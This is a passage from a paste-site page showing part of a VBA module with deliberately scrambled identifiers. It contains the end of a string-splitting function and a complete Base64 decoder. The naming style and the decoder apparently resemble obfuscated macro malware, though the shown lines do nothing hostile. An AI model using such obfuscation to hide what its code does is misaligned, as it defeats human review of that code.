  1533.     If InStr(1, iUGqUtdps, N6LHhLlux, vbBinaryCompare) = 0 Then GoTo QuitHere
  1534.    
  1535.     ReDim kVaXV9w2y(0)
  1536.     tPwdtDwaY = 1
  1537.     rWOEH4K43 = 1
  1538.    
  1539.     Do
  1540.         If zuPGbqBU9 + 1 = KUmyJx5Jh Then
  1541.             kVaXV9w2y(zuPGbqBU9) = Mid$(iUGqUtdps, tPwdtDwaY)
  1542.             Exit Do
  1543.         End If
  1544.         rWOEH4K43 = InStr(rWOEH4K43, iUGqUtdps, N6LHhLlux, vbBinaryCompare)
  1545.         If rWOEH4K43 = 0 Then
  1546.             If Not tPwdtDwaY = pOKAiWpG0 Then
  1547.                 kVaXV9w2y(zuPGbqBU9) = Mid$(iUGqUtdps, tPwdtDwaY)
  1548.             End If
  1549.             Exit Do
  1550.         End If
  1551.         kVaXV9w2y(zuPGbqBU9) = Mid$(iUGqUtdps, tPwdtDwaY, rWOEH4K43 - tPwdtDwaY)
  1552.         zuPGbqBU9 = zuPGbqBU9 + 1
  1553.         ReDim Preserve kVaXV9w2y(zuPGbqBU9)
  1554.         tPwdtDwaY = rWOEH4K43 + WDhIDUXmY
  1555.         rWOEH4K43 = tPwdtDwaY
  1556.     Loop
  1557.    
  1558.     ReDim Preserve kVaXV9w2y(zuPGbqBU9)
  1559.     rZjOyBMBM = kVaXV9w2y
  1560.    
  1561.     Exit Function
  1562.    
  1563. QuitHere:
  1564.     ReDim rZjOyBMBM(-1 To -1)
  1565. End Function
  1566.  
  1567.  
  1568.  
  1569.  
  1570.  
  1571. Public Function duWDA4jsx(W7BErUZth As String) As String
  1572.  
  1573.     Dim weEl5jr9r() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
  1574.     Dim bCfrzfp5w(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
  1575.     Dim ODb2b533C As Long
  1576.  
  1577.     W7BErUZth = Replace(W7BErUZth, vbCr, vbNullString)
  1578.     W7BErUZth = Replace(W7BErUZth, vbLf, vbNullString)
  1579.  
  1580.     ODb2b533C = Len(W7BErUZth) Mod 4
  1581.     If ODb2b533C Then Exit Function
  1582.        
  1583.    
  1584.     If InStrRev(W7BErUZth, "==") Then
  1585.         iPad = 2
  1586.     ElseIf InStrRev(W7BErUZth, "=") Then
  1587.         iPad = 1
  1588.     End If
  1589.      
  1590.     For ODb2b533C = 0 To 255
  1591.         Select Case ODb2b533C
  1592.             Case 65 To 90
  1593.                 bTrans(ODb2b533C) = ODb2b533C - 65
  1594.             Case 97 To 122
  1595.                 bTrans(ODb2b533C) = ODb2b533C - 71
  1596.             Case 48 To 57
  1597.                 bTrans(ODb2b533C) = ODb2b533C + 4
  1598.             Case 43
  1599.                 bTrans(ODb2b533C) = 62
  1600.             Case 47
  1601.                 bTrans(ODb2b533C) = 63
  1602.         End Select
  1603.     Next ODb2b533C
  1604.  
  1605.     For ODb2b533C = 0 To 63
  1606.         lPowers6(ODb2b533C) = ODb2b533C * 64
  1607.         lPowers12(ODb2b533C) = ODb2b533C * 4096
  1608.         bCfrzfp5w(ODb2b533C) = ODb2b533C * 262144
  1609.     Next ODb2b533C
  1610.  
  1611.     bIn = StrConv(W7BErUZth, vbFromUnicode)
  1612.     ReDim weEl5jr9r((((UBound(bIn) + 1) \ 4) * 3) - 1)
  1613.    
  1614.     For lChar = 0 To UBound(bIn) Step 4
  1615.         lQuad = bCfrzfp5w(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
  1616.                 lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
  1617.         ODb2b533C = lQuad And 16711680
  1618.         weEl5jr9r(lPos) = ODb2b533C \ 65536
  1619.         ODb2b533C = lQuad And 65280
  1620.         weEl5jr9r(lPos + 1) = ODb2b533C \ 256
  1621.         weEl5jr9r(lPos + 2) = lQuad And 255
  1622.         lPos = lPos + 3
  1623.     Next lChar
  1624.  
  1625.     sOut = StrConv(weEl5jr9r, vbUnicode)
  1626.     If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
  1627.     duWDA4jsx = sOut
  1628.  
  1629. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement